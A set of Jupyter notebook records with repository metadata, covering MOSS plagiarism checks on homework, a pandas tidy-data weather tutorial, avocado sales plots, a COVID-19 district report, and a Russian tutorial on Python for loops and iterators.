"convert_notebooks()",
"100%|██████████| 251/251 [06:09<00:00, 1.47s/it]\n"
],
[
"m, url = submit_moss()",
"Report Url: http://moss.stanford.edu/results/136599236\n"
],
[
"#mosspy.download_report(url, \"hw2_report/\", connections=8, log_level=20)",
"_____no_output_____"
],
[
"#mosspy.download_report(\"http://moss.stanford.edu/results/136599236\", \"hw2_report/\", connections=8, log_level=20)",
"_____no_output_____"
],
[
"clone_repos(pattern=\"homework-1\", store_at=\"/home/andy/Dropbox/columbia_safe/applied_machine_learning_spring_2018/submissions_hw1/\")",
"100%|██████████| 146/146 [01:36<00:00, 1.52it/s]\n"
],
[
"convert_notebooks()",
"100%|██████████| 2/2 [00:03<00:00, 1.62s/it]\n"
],
[
"m, url = submit_moss()",
"Report Url: http://moss.stanford.edu/results/558681454\n"
],
[
"mosspy.download_report(url, \"hw1_report/\", connections=8, log_level=20)",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb01b8b3a852589c053a2a47be153f97163ce5d4 | 107,398 | ipynb | Jupyter Notebook | notebook/python/tidy-data-with-pandas.ipynb | praveenhm/machine-learning-tutorials | 0343004b3740f87d3636948428e8e28e6cf43ce0 | [
"MIT"
] | null | null | null | notebook/python/tidy-data-with-pandas.ipynb | praveenhm/machine-learning-tutorials | 0343004b3740f87d3636948428e8e28e6cf43ce0 | [
"MIT"
] | null | null | null | notebook/python/tidy-data-with-pandas.ipynb | praveenhm/machine-learning-tutorials | 0343004b3740f87d3636948428e8e28e6cf43ce0 | [
"MIT"
] | null | null | null | 33.157765 | 289 | 0.374905 | [
[
[
"%run ../common-imports.ipynb",
"_____no_output_____"
]
],
[
[
"\n# Tidy Data with Pandas",
"_____no_output_____"
]
],
[
[
"\n# Reading the csv files into a pandas data frame\n\ntemperature = pd.read_csv(\"../../datasets/temperature.csv\")\nhumidity = pd.read_csv(\"../../datasets/humidity.csv\")\nwind_speed = pd.read_csv(\"../../datasets/wind_speed.csv\")\n\ntemperature.head()",
"_____no_output_____"
],
[
"# Importing the libraries\nimport pandas as pd\nimport numpy as np# Displaying the first 5 rows of the data frame\n\ntemperature.describe(include='all').transpose()",
"_____no_output_____"
]
],
[
[
"# Data Manipulation\n\nLet us unpivot, or melt: convert from wide format to long format, as tidy-data thinking recommends.\n\nTidy data essentially says:\n - Each row should be an observation\n - Each column should be a variable. Roughly, each column that is not an identifier or dimension should be a measure.\n - A dataframe should represent a logical unit of observables",
"_____no_output_____"
]
],
[
[
"tidy_temperature = pd.melt(temperature, \n id_vars=\"datetime\", \n var_name=\"city\", value_name=\"temperature\")",
"_____no_output_____"
],
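[
"# A minimal sketch of what pd.melt does, shown on a tiny made-up wide table\n# (the city names 'Boston' and 'Denver' here are purely illustrative).\ntoy_wide = pd.DataFrame({'datetime': ['2015-01-01', '2015-01-02'],\n                         'Boston': [1.0, 2.0],\n                         'Denver': [3.0, 4.0]})\npd.melt(toy_wide, id_vars='datetime', var_name='city', value_name='temperature')",
"_____no_output_____"
],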
[
"tidy_temperature.describe(include='all')",
"_____no_output_____"
],
[
"tidy_temperature.head()",
"_____no_output_____"
],
[
"tidy_temperature.sample(20)",
"_____no_output_____"
],
[
"tidy_humidity = pd.melt(humidity, \n id_vars=\"datetime\", \n var_name=\"city\", value_name=\"humidity\")",
"_____no_output_____"
],
[
"tidy_windspeed = pd.melt(wind_speed, \n id_vars=\"datetime\", \n var_name=\"city\", value_name=\"wind_speed\")",
"_____no_output_____"
],
[
"raw_weather = tidy_temperature\\\n .join(tidy_humidity.set_index(['datetime', 'city']), on=['datetime', 'city'])\\\n .join(tidy_windspeed.set_index(['datetime', 'city']), on=['datetime', 'city'])\nraw_weather.sample(20)",
"_____no_output_____"
]
],
[
[
"# Let's cleanup the data \nThere are many strategies to deal with NaN data. Here, since it is weather, perhaps a reasonable way would be interpolating the temperature, humidity and wind_speed. In other words, the tempeture today is reasonable between that of yesterday and tomorrow, as a good approximation.\n\n",
"_____no_output_____"
]
],
[
[
"raw_weather.describe()\n",
"_____no_output_____"
],
[
"# The amount of missing values\nraw_weather.isna().sum()",
"_____no_output_____"
],
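[
"# A small sketch of how linear interpolation fills gaps: an interior NaN becomes the\n# average of its neighbours, while a leading NaN has nothing before it and stays NaN.\npd.Series([np.nan, 1.0, np.nan, 3.0]).interpolate()",
"_____no_output_____"
],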
[
"weather = raw_weather.interpolate()",
"_____no_output_____"
],
[
"weather.isna().sum()",
"_____no_output_____"
]
],
[
[
"This is because we could not interpolate into the first row! Therefore, let us omit it.\n",
"_____no_output_____"
]
],
[
[
"weather = weather.dropna()\nweather.isna().sum()",
"_____no_output_____"
],
[
"# Filter down to only San Francisco weather\nsf_weather = weather[weather['city'] == 'San Francisco']\nsf_weather.sample(10)",
"_____no_output_____"
],
[
"# Project down to only temperature and humidity\ndata = weather[['datetime', 'city','temperature', 'humidity']]\ndata.sample(10)",
"_____no_output_____"
],
[
"# The average weather for each city\nmeans = weather.groupby('city')['temperature', 'humidity', 'wind_speed'].mean()\n\nmeans.columns = ['mean_temperature', 'mean_humidity', 'mean_speed']\nmeans.sample(10)",
"_____no_output_____"
]
],
[
[
"Note the two-levels of the columns above. Let us now flatten the data:\n",
"_____no_output_____"
]
],
[
[
"means = means.reset_index()\nmeans.head()",
"_____no_output_____"
]
],
[
[
"Now, let's join it back with the original data\n",
"_____no_output_____"
]
],
[
[
"means.sample(10)",
"_____no_output_____"
],
[
"df = means.set_index('city')",
"_____no_output_____"
]
],
[
[
"Therefore, now we can remove the unnecessary column city.",
"_____no_output_____"
]
],
[
[
"means_data = means.drop(['city'], axis=1)\nmeans_data.sample(10)",
"_____no_output_____"
],
[
"cor = means_data.corr()\ncor",
"_____no_output_____"
],
[
"data = weather.merge(means, left_on='city', right_on='city')",
"_____no_output_____"
],
[
"data.sample(10)",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
]
] |
cb01bbd9a62eed5b33b88c6695ee8b426ec68472 | 113,371 | ipynb | Jupyter Notebook | avocador_boxplots_histogramas_mapa.ipynb | morrisshm/arte_de_analitica_mau | d8781afc360454a585f06c1eba8edabbd17cbf7e | [
"MIT"
] | 1 | 2020-10-27T14:14:05.000Z | 2020-10-27T14:14:05.000Z | avocador_boxplots_histogramas_mapa.ipynb | morrisshm/arte_de_analitica_mau | d8781afc360454a585f06c1eba8edabbd17cbf7e | [
"MIT"
] | null | null | null | avocador_boxplots_histogramas_mapa.ipynb | morrisshm/arte_de_analitica_mau | d8781afc360454a585f06c1eba8edabbd17cbf7e | [
"MIT"
] | null | null | null | 211.51306 | 28,960 | 0.901165 | [
[
[
"import pandas as pd\nimport matplotlib\nimport matplotlib.pyplot as plt \nimport numpy as np; np.random.seed(0)\nimport seaborn as sns\n\ndata = pd.read_csv(\"avocado.csv\")\npd.set_option('display.max_rows', 100)\nprint(data)\ndata.head()\ndata.tail()",
"_____no_output_____"
],
[
"#BoxPlot_Avocado\ncolumna_1 = data[\"Small Bags\"]\ncolumna_2 = data[\"Large Bags\"]\ncolumna_3 = data[\"XLarge Bags\"]\ncolumna_4 = data[\"Total Bags\"]\nmyData = [columna_1,columna_2,columna_3,columna_4]\nfig = plt.figure(figsize =(10, 7))\nax = fig.add_axes([0, 0, 1, 1]) \nbp = ax.boxplot(myData) \nplt.title(\"Bags Boxplot\") \nax.set_xticklabels(['Small Bags', 'Large Bags', \n 'XLarge Bags','Total Bags']) \n\nplt.show()",
"_____no_output_____"
],
[
"#Histograma Precios Promedio\nnp.random.seed(10**7) \nmu = 121 \nsigma = 21\nx = mu + sigma * np.random.randn(1000) \n \nnum_bins = 100\n \nn, bins, patches = plt.hist(data[\"AveragePrice\"], num_bins, \n density = 1, \n color ='purple', \n alpha = 0.7) \n \ny = ((1 / (np.sqrt(2 * np.pi) * sigma)) *\n np.exp(-0.5 * (1 / sigma * (bins - mu))**2)) \n \nplt.plot(bins, y, '--', color ='black') \n \nplt.xlabel('X-Axis') \nplt.ylabel('Y-Axis') \n \nplt.title('Precio Promedio', \n fontweight =\"bold\") \n \nplt.show() ",
"_____no_output_____"
],
[
"#Histograma de Volumen total\nnp.random.seed(10**7) \nmu = 121 \nsigma = 21\nx = mu + sigma * np.random.randn(1000) \n \nnum_bins = 100\n \nn, bins, patches = plt.hist(data[\"Total Volume\"], num_bins, \n density = 1, \n color ='red', \n alpha = 0.7) \n \ny = ((1 / (np.sqrt(2 * np.pi) * sigma)) *\n np.exp(-0.5 * (1 / sigma * (bins - mu))**2)) \n \nplt.plot(bins, y, '--', color ='orange') \n \nplt.xlabel('X-Axis') \nplt.ylabel('Y-Axis') \n \nplt.title('Volumen Total', \n fontweight =\"bold\")\n",
"_____no_output_____"
],
[
"#Histograma de Large Bags\nnp.random.seed(10**7) \nmu = 121 \nsigma = 21\nx = mu + sigma * np.random.randn(1000) \n \nnum_bins = 100\n \nn, bins, patches = plt.hist(data[\"Large Bags\"], num_bins, \n density = 3, \n color ='red', \n alpha = 0.7) \n \ny = ((1 / (np.sqrt(2 * np.pi) * sigma)) *\n np.exp(-0.5 * (1 / sigma * (bins - mu))**2)) \n \nplt.plot(bins, y, '--', color ='red') \n \nplt.xlabel('X-Axis') \nplt.ylabel('Y-Axis') \n \nplt.title('Bolsas Grandes', \n fontweight =\"bold\")",
"_____no_output_____"
],
[
"#Histograma de Small Bags\nnp.random.seed(10**7) \nmu = 121 \nsigma = 21\nx = mu + sigma * np.random.randn(1000) \n \nnum_bins = 100\n \nn, bins, patches = plt.hist(data[\"Small Bags\"], num_bins, \n density = 3, \n color ='blue', \n alpha = 0.7) \n \ny = ((1 / (np.sqrt(2 * np.pi) * sigma)) *\n np.exp(-0.5 * (1 / sigma * (bins - mu))**2)) \n \nplt.plot(bins, y, '--', color ='orange') \n \nplt.xlabel('X-Axis') \nplt.ylabel('Y-Axis') \n \nplt.title('Bolsas Pequeñas', \n fontweight =\"bold\")",
"_____no_output_____"
],
[
"#Histograma Bolsas Extra Grandes\nnp.random.seed(10**7) \nmu = 121 \nsigma = 21\nx = mu + sigma * np.random.randn(1000) \n \nnum_bins = 100\n \nn, bins, patches = plt.hist(data[\"XLarge Bags\"], num_bins, \n density = 3, \n color ='brown', \n alpha = 0.7) \n \ny = ((1 / (np.sqrt(2 * np.pi) * sigma)) *\n np.exp(-0.5 * (1 / sigma * (bins - mu))**2)) \n \nplt.plot(bins, y, '--', color ='brown') \n \nplt.xlabel('X-Axis') \nplt.ylabel('Y-Axis') \n \nplt.title('Bolsas Extra Grandes', \n fontweight =\"bold\")",
"_____no_output_____"
],
[
"np.random.seed(10**7) \nmu = 121 \nsigma = 21\nx = mu + sigma * np.random.randn(1000) \n \nnum_bins = 100\n \nn, bins, patches = plt.hist(data[\"Total Bags\"], num_bins, \n density = 3, \n color ='yellow', \n alpha = 0.7) \n \ny = ((1 / (np.sqrt(2 * np.pi) * sigma)) *\n np.exp(-0.5 * (1 / sigma * (bins - mu))**2)) \n \nplt.plot(bins, y, '--', color ='red') \n \nplt.xlabel('X-Axis') \nplt.ylabel('Y-Axis') \n \nplt.title('Bolsas Grandes', \n fontweight =\"bold\")",
"_____no_output_____"
],
[
"newdf = data.copy()\nnewdf = newdf.drop(['Date','type','year','region', 'XLarge Bags'], axis=1)\nprint(data.head())\n",
" Unnamed: 0 Date AveragePrice Total Volume 4046 4225 \\\n0 0 2015-12-27 1.33 64236.62 1036.74 54454.85 \n1 1 2015-12-20 1.35 54876.98 674.28 44638.81 \n2 2 2015-12-13 0.93 118220.22 794.70 109149.67 \n3 3 2015-12-06 1.08 78992.15 1132.00 71976.41 \n4 4 2015-11-29 1.28 51039.60 941.48 43838.39 \n\n 4770 Total Bags Small Bags Large Bags XLarge Bags type \\\n0 48.16 8696.87 8603.62 93.25 0.0 conventional \n1 58.33 9505.56 9408.07 97.49 0.0 conventional \n2 130.50 8145.35 8042.21 103.14 0.0 conventional \n3 72.58 5811.16 5677.40 133.76 0.0 conventional \n4 75.78 6183.95 5986.26 197.69 0.0 conventional \n\n year region \n0 2015 Albany \n1 2015 Albany \n2 2015 Albany \n3 2015 Albany \n4 2015 Albany \n"
],
[
"data.describe(include=np.object).transpose()\n",
"_____no_output_____"
],
[
"ax = sns.heatmap(data)",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb01bd6a220908b95af6d932ca7cd7b671f16ccb | 4,203 | ipynb | Jupyter Notebook | ipynb/Germany-Niedersachsen-LK-Wesermarsch.ipynb | RobertRosca/oscovida.github.io | d609949076e3f881e38ec674ecbf0887e9a2ec25 | [
"CC-BY-4.0"
] | null | null | null | ipynb/Germany-Niedersachsen-LK-Wesermarsch.ipynb | RobertRosca/oscovida.github.io | d609949076e3f881e38ec674ecbf0887e9a2ec25 | [
"CC-BY-4.0"
] | null | null | null | ipynb/Germany-Niedersachsen-LK-Wesermarsch.ipynb | RobertRosca/oscovida.github.io | d609949076e3f881e38ec674ecbf0887e9a2ec25 | [
"CC-BY-4.0"
] | null | null | null | 29.391608 | 190 | 0.519867 | [
[
[
"# Germany: LK Wesermarsch (Niedersachsen)\n\n* Homepage of project: https://oscovida.github.io\n* [Execute this Jupyter Notebook using myBinder](https://mybinder.org/v2/gh/oscovida/binder/master?filepath=ipynb/Germany-Niedersachsen-LK-Wesermarsch.ipynb)",
"_____no_output_____"
]
],
[
[
"import datetime\nimport time\n\nstart = datetime.datetime.now()\nprint(f\"Notebook executed on: {start.strftime('%d/%m/%Y %H:%M:%S%Z')} {time.tzname[time.daylight]}\")",
"_____no_output_____"
],
[
"%config InlineBackend.figure_formats = ['svg']\nfrom oscovida import *",
"_____no_output_____"
],
[
"overview(country=\"Germany\", subregion=\"LK Wesermarsch\");",
"_____no_output_____"
],
[
"# load the data\ncases, deaths, region_label = germany_get_region(landkreis=\"LK Wesermarsch\")\n\n# compose into one table\ntable = compose_dataframe_summary(cases, deaths)\n\n# show tables with up to 500 rows\npd.set_option(\"max_rows\", 500)\n\n# display the table\ntable",
"_____no_output_____"
]
],
[
[
"# Explore the data in your web browser\n\n- If you want to execute this notebook, [click here to use myBinder](https://mybinder.org/v2/gh/oscovida/binder/master?filepath=ipynb/Germany-Niedersachsen-LK-Wesermarsch.ipynb)\n- and wait (~1 to 2 minutes)\n- Then press SHIFT+RETURN to advance code cell to code cell\n- See http://jupyter.org for more details on how to use Jupyter Notebook",
"_____no_output_____"
],
[
"# Acknowledgements:\n\n- Johns Hopkins University provides data for countries\n- Robert Koch Institute provides data for within Germany\n- Open source and scientific computing community for the data tools\n- Github for hosting repository and html files\n- Project Jupyter for the Notebook and binder service\n- The H2020 project Photon and Neutron Open Science Cloud ([PaNOSC](https://www.panosc.eu/))\n\n--------------------",
"_____no_output_____"
]
],
[
[
"print(f\"Download of data from Johns Hopkins university: cases at {fetch_cases_last_execution()} and \"\n f\"deaths at {fetch_deaths_last_execution()}.\")",
"_____no_output_____"
],
[
"# to force a fresh download of data, run \"clear_cache()\"",
"_____no_output_____"
],
[
"print(f\"Notebook execution took: {datetime.datetime.now()-start}\")\n",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
]
] |
cb01be0c7a243246de0d154bc31cd72f929f2560 | 46,741 | ipynb | Jupyter Notebook | lect04_for/.ipynb_checkpoints/for-checkpoint.ipynb | pileyan/DPO_python_2022 | 693e79b16716ab2894845b7f927caf6cc51e9725 | [
"MIT"
] | 3 | 2022-02-19T17:20:33.000Z | 2022-03-02T11:35:56.000Z | lect04_for/.ipynb_checkpoints/for-checkpoint.ipynb | pileyan/DPO_python_2022 | 693e79b16716ab2894845b7f927caf6cc51e9725 | [
"MIT"
] | null | null | null | lect04_for/.ipynb_checkpoints/for-checkpoint.ipynb | pileyan/DPO_python_2022 | 693e79b16716ab2894845b7f927caf6cc51e9725 | [
"MIT"
] | 1 | 2022-02-23T19:25:13.000Z | 2022-02-23T19:25:13.000Z | 24.928533 | 954 | 0.513126 | [
[
[
"Центр непрерывного образования\n\n# Программа «Python для автоматизации и анализа данных»\n\nНеделя 3 - 1\n\n*Ян Пиле, НИУ ВШЭ* \n\n# Цикл for. Применение циклов к строкам, спискам, кортежам и словарям.",
"_____no_output_____"
],
[
"Циклы мы используем в тех случаях, когда нужно повторить что-нибудь n-ное количество раз. Например, у нас уже был цикл **While**",
"_____no_output_____"
]
],
[
[
"ss = {1,2,3}\nss.pop()",
"_____no_output_____"
],
[
"ss.pop()",
"_____no_output_____"
],
[
"i = 1\nwhile i<=10:\n print(i)\n i+=1",
"1\n2\n3\n4\n5\n6\n7\n8\n9\n10\n"
]
],
[
[
"Здесь мы проверяем условие *i <= 10* (оно выполнено, *i = 1*), заходим в цикл с *i = 1*, печатаем значение *i*, добавляем к нему 1 иииии... \\\nСнова проверяем условие *i <= 10* (оно выполнено, *i = 2*), заходим в цикл с *i = 2*, печатаем значение *i*, добавляем к нему 1 иииии... \\\nДелаем такие же действия, пока *i* не становится равным 11, тогда условие входа в цикл не выполняется, и цикл завершается",
"_____no_output_____"
],
[
"Как мы уже обсуждали, цикл *While* гипотетически может \"уходить в бесконечность\", если условие, которое проверяется на входе в цикл будет выполнено всегда, например **While True**. Такие зацикливания можно прерывать оператором **break**, НО, это надо использовать очень аккуратно",
"_____no_output_____"
]
],
[
[
"i = 1\nwhile True:\n print(i)\n i+=1\n if i==11:\n break",
"1\n2\n3\n4\n5\n6\n7\n8\n9\n10\n"
]
],
[
[
"### FOR",
"_____no_output_____"
],
[
"В Python цикл начинается с ключевого слова **for**, за которым следует произвольное имя переменной, которое будет хранить значения следующего объекта последовательности. Общий синтаксис **for...in** в python выглядит следующим образом:\n\n**for** <переменная> **in** <последовательность>:\n\n <действие> \n \n**else:**\n\n <действие>\n \nЭлементы “последовательности” перебираются один за другим “переменной” цикла; если быть точным, переменная указывает на элементы. Для каждого элемента выполняется “действие”.",
"_____no_output_____"
],
[
"<img src =\"https://d33wubrfki0l68.cloudfront.net/09c51b2f33c74a58ae5ae12689b2c5441e6f6bb4/83a52/wp-content/uploads/2017/06/forloop.png\" alt =\"Test picture\" style=\"width: 300px;\"/>",
"_____no_output_____"
],
[
"Вот пример простейшего цикла **for**",
"_____no_output_____"
]
],
[
[
"languages = [\"C\", \"C++\", \"Perl\", \"Python\"]\nfor x in languages:\n print(x)",
"C\nC++\nPerl\nPython\n"
]
],
[
[
"Элементы “последовательности” перебираются один за другим “переменной” цикла; \\\nесли быть точным, переменная указывает на элементы. Для каждого элемента выполняется “действие”.\\\nЗдесь в роли \"последовательности\" у нас список",
"_____no_output_____"
],
[
"### Итерируемый объект \n\n**Итерация** - это общий термин, который описывает процедуру взятия элементов чего-то по очереди.\n\nВ более общем смысле, это последовательность инструкций, которая повторяется определенное количество раз или до выполнения указанного условия.\n\n**Итерируемый объект** (iterable) - это объект, который способен возвращать элементы по одному(не обязательно по порядку). Кроме того, это объект, из которого можно получить итератор.\n\nПримеры итерируемых объектов:\n\n* все последовательности: список, строка, кортеж\n* словари и множества\n* файлы",
"_____no_output_____"
],
[
"**Итератор** (iterator) - это объект, который возвращает свои элементы по одному за раз.\n\nС точки зрения Python - это любой объект, у которого есть метод __next__. Этот метод возвращает следующий элемент, если он есть, или возвращает исключение **StopIteration**, когда элементы закончились.\n\nКроме того, итератор запоминает, на каком объекте он остановился в последнюю итерацию.",
"_____no_output_____"
],
[
"Сейчас сложновато: Наш цикл for проходит именно по итератору! Когда мы говорим:\n\nfor object in iterable:\n\n do something \n \nМы, на самом деле, вызываем метод итерируемого объекта , который возвращает итератор.\nТаким образом, создаем объект-итератор , по которому и бежит цикл for.\nДля того чтобы все это увидеть, есть функция iter() В качестве аргумента ей передается итерируемый объект (словарь, список, лист и т.д.) , а она возвращает соответствующий итератор.\n",
"_____no_output_____"
]
],
[
[
"s = {1,2,3,4,5}\nprint(type(s))\nprint(type(iter(s)))",
"<class 'set'>\n<class 'set_iterator'>\n"
],
[
"for i in iter(s):\n print(i)",
"1\n2\n3\n4\n5\n"
]
],
[
[
"Посмотрим на встроенную функцию next(). Она должна отдавать следующий элемент итератора. ",
"_____no_output_____"
]
],
[
[
"s = {1,2,3,4,5}\ns_iter = iter(s)\nprint(next(s_iter))\nprint(next(s_iter))\nprint(next(s_iter))",
"1\n2\n3\n"
]
],
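[
[
"# Небольшой набросок: когда элементы итератора закончились, next() порождает исключение StopIteration.\nshort_iter = iter([1, 2])\nprint(next(short_iter))\nprint(next(short_iter))\ntry:\n    print(next(short_iter))\nexcept StopIteration:\n    print('Элементы закончились: StopIteration')",
"_____no_output_____"
]
],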
[
[
"Отлично! мы по одному научились перебирать элементы из итерируемого объекта. Стоит отдельно остановиться на том, что цикл **for**, в Python, устроен несколько иначе, чем в большинстве других языков. Он больше похож на **for...each**, или же **for...of**.",
"_____no_output_____"
],
[
"Например, для Javascript проход по списку с выводом на печать всех его элементов выглядит так:",
"_____no_output_____"
]
],
[
[
"%%js\nlet numbers = [10, 12, 15, 18, 20];\nfor (let i = 0; i < numbers.length; i += 1) {\n console.log(numbers[i])\n}",
"_____no_output_____"
],
[
"l = [1,2,3,4,5]\nlist(map(str,l))",
"_____no_output_____"
]
],
[
[
"\nЕсли же, мы перепишем цикл **for** с помощью цикла **while**, используя индексы, то работать такой подход будет только с последовательностями:",
"_____no_output_____"
]
],
[
[
"list_of_numbers = [1,2,3]\nindex = 0\nwhile index < len(list_of_numbers):\n print(list_of_numbers[index])\n index += 1",
"1\n2\n3\n"
]
],
[
[
"А с итерируемыми объектами, последовательностями не являющимися, не будет (потому что в множестве к элементу по индексу не обращаются!):",
"_____no_output_____"
]
],
[
[
"set_of_numbers = {1,2,3}\nindex = 0 \nwhile index < len(set_of_numbers):\n print(set_of_numbers[index])\n index += 1",
"_____no_output_____"
]
],
[
[
"Ну если уж прям совсем никак без индексации, то к любому итерируемому объекту можно применить функцию enumerate(), \\\nкоторая, как следует из названия, коллекцию занумерует. Здесь мы наделали кортежей вида (индекс, элемент)",
"_____no_output_____"
]
],
[
[
"set_of_numbers = {1,2,3,4,5,6}\nfor i in enumerate(set_of_numbers):\n print(i)",
"(0, 1)\n(1, 2)\n(2, 3)\n(3, 4)\n(4, 5)\n(5, 6)\n"
]
],
[
[
"Чтобы выдавать это в человеческом виде, можно прямо после for сказать, что мы \"итерируемся\" по индексам и объектам. \\\nВыглядит это следующим образом:",
"_____no_output_____"
]
],
[
[
"set_of_numbers = [1,2,3]\nfor index, element in enumerate(set_of_numbers):\n print(index, element)",
"0 1\n1 2\n2 3\n"
]
],
[
[
"### Немного умных слов об итераторах\n\n**Протокол итератора**\n\nТеперь формализуем протокол итератора целиком:\n\n* Чтобы получить итератор мы должны передать функции iter итерируемый объект.\n* Далее мы передаём итератор функции next.\n* Когда элементы в итераторе закончились, порождается исключение StopIteration. (Пока представим себе исключения, как объект специального типа, который генерируется в момент ошибки или какого-то терминального события. Например, они появляются, когда мы пытаемся делить на ноль или когда что-то напутали с типами\n\n**Особенности**:\n\n* Любой объект, передаваемый функции iter без исключения TypeError — итерируемый объект.\n* Любой объект, передаваемый функции next без исключения TypeError — итератор.\n* Любой объект, передаваемый функции iter и возвращающий сам себя — итератор.\n\n**Плюсы итераторов:**\n\nИтераторы работают \"лениво\" (en. lazy). А это значит, что они не выполняют какой-либо работы, до тех пор, пока мы их об этом не попросим. А это классный функционал, потому что очень многие виды данных в память компьютера не помещаются, а \"ленивый\" итератор позволяет эти данные читать по кускам! Так, например, можно посчитать количество строк в текстовом файле на несколько гигабайт.\n\nТаким образом, мы можем оптимизировать потребление ресурсов ОЗУ и CPU, а так же создавать бесконечные последовательности.",
"_____no_output_____"
],
[
"<img src =\"https://files.realpython.com/media/t.ba63222d63f5.png\" alt =\"Test picture\" style=\"width: 300px;\"/>",
"_____no_output_____"
],
[
"\nНа самом деле мы уже попробовали использовать цикл **for** на множествах и на списках. \\\nТеперь давайте систематически разберемся, как for используется с разными коллекциями",
"_____no_output_____"
],
[
"### Списки, строки, множества и кортежи",
"_____no_output_____"
],
[
"В общем, по индексированным последовательностям мы уже ходить умеем. В списках и кортежах это проход по элементам(подряд)\\\nа в строках это проход по буквам(в порядке следования).",
"_____no_output_____"
]
],
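[
[
"# Набросок «ленивой» обработки: файловый объект — это итератор, строки выдаются по одной,\n# поэтому даже очень большой файл не нужно целиком загружать в память.\n# Настоящего большого файла здесь нет, поэтому для иллюстрации используем io.StringIO.\nimport io\n\nfake_file = io.StringIO(chr(10).join(['строка 1', 'строка 2', 'строка 3']))\ncount = 0\nfor line in fake_file:   # строки выдаются лениво, по одной\n    count += 1\nprint(count)",
"_____no_output_____"
]
],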
[
[
"x = 'Take a look around'\nfor i in x:\n print(i)",
"T\na\nk\ne\n \na\n \nl\no\no\nk\n \na\nr\no\nu\nn\nd\n"
],
[
"# Здесь мы прошлись по элементам списка и посчитали их сумму\n# В цикл вошли с total = 0 и на каждом элементе добавляли к total значение элемента\nx = [1,2,3,4]\ntotal = 0\n\nfor i in x:\n total+=i\nprint(total)",
"10\n"
],
[
"# Здесь мы прошлись по элементам кортежа и посчитали сумму тех, которые делятся на 7 нацело\n# В цикл вошли с total = 0 и на каждом элементе добавляли к total значение элементов, удовлетворяющих условию\n\nx = (1,2,3,4,7,49,4,23,63,28,28)\ntotal = 0\n\nfor i in x:\n if i % 7 == 0:\n total+=i\nprint(total)",
"175\n"
],
[
"# Здесь мы преобразовали кортеж из предыдущей ячейки в множество и посчитали сумму четных элементов\n# В цикл вошли с total = 0 и на каждом элементе добавляли к total значение элементов, удовлетворяющих условию\nx_set = set(x)\ntotal = 0\n\nfor i in x_set:\n if i % 2 == 0:\n total+=i\nprint(total)\nprint(x_set)",
"34\n{1, 2, 3, 4, 7, 49, 23, 28, 63}\n"
]
],
[
[
"### Словари\n\nВ случае словарей итерация (по умолчанию) происходит по ключам",
"_____no_output_____"
]
],
[
[
"d = {'foo': 1, 'bar': 2, 'baz': 3}\nfor k in d:\n print(k)",
"foo\nbar\nbaz\n"
]
],
[
[
"Но по ключам можно вынимать и соответствующие значения",
"_____no_output_____"
]
],
[
[
"for k in d:\n print(d[k])",
"1\n2\n3\n"
]
],
[
[
"Также можно напрямую указать, по чему мы итерируемся: по ключам, по значениям или по кортежам ключ-значение\\\nПомните методы **.values()** , **.keys()** и **.items()** ?",
"_____no_output_____"
]
],
[
[
"print(d)\nfor v in d.values():\n print(v)",
"{'foo': 1, 'bar': 2, 'baz': 3}\n1\n2\n3\n"
],
[
"print(d)\nfor v in d.keys():\n print(v)",
"{'foo': 1, 'bar': 2, 'baz': 3}\nfoo\nbar\nbaz\n"
],
[
"print(d)\nfor v in d.items():\n print(v)",
"{'foo': 1, 'bar': 2, 'baz': 3}\n('foo', 1)\n('bar', 2)\n('baz', 3)\n"
]
],
[
[
"А еще можно \"распаковать\" эти кортежи-ключ значения (примерно так же, как мы сделали для **enumerate**)",
"_____no_output_____"
]
],
[
[
"d = {'foo': 1, 'bar': 2, 'baz': 3}\nfor k, v in d.items():\n print('k =', k, ', v =', v)",
"k = foo , v = 1\nk = bar , v = 2\nk = baz , v = 3\n"
]
],
[
[
"Перед тем, как начать решать какие-то задачи, остается упомянуть крайне полезную функцию **range()**. \\\nПростыми словами, **range()** позволяет вам генерировать ряд чисел в рамках заданного диапазона. В зависимости от того, как много аргументов вы передаете функции, вы можете решить, где этот ряд чисел начнется и закончится, а также насколько велика разница будет между двумя числами.",
"_____no_output_____"
],
[
"Есть три способа вызова **range()**:\n\n* **range(стоп)** берет один аргумент\n* **range(старт, стоп)** берет два аргумента\n* **range(старт, стоп, шаг)** берет три аргумента\n\nНа деле **range()** возвращает \"ленивый\" итерируемый объект (Да, сейчас что-то сложно). Понимать надо следующее:\\\n* По range() можно итерироваться (значит это итерируемый объект)\n* range() не держит все свои объекты в памяти, а достает их \"по требованию\" (прям как итератор!)\n* Но есть и ряд отличий, который делает range() похожим на последовательности (списки, кортежи и строки)",
"_____no_output_____"
]
],
[
[
"# Это как раз первый случай (мы вывели все целые числа ДО трех)\nfor i in range(3):\n print(i)",
"0\n1\n2\n"
],
[
"# Это второй случай (мы вывели все целые числа от 0 до 10 не включая правый конец)\nfor i in range(0, 10):\n print(i)",
"0\n1\n2\n3\n4\n5\n6\n7\n8\n9\n"
],
[
"# Ну а это третий случай (мы вывели все целые числа от 0 до 10 не включая правый конец с шагом 2)\n# То есть нулевое, второе, четвертое и т.д.\nfor i in range(0, 10, 2):\n print(i)",
"0\n2\n4\n6\n8\n"
]
],
[
[
"Шаг здесь может быть положительным или отрицательным числом, но не может быть нулем! Отрицательное число будет означать уменьшение аргумента, то есть:",
"_____no_output_____"
]
],
[
[
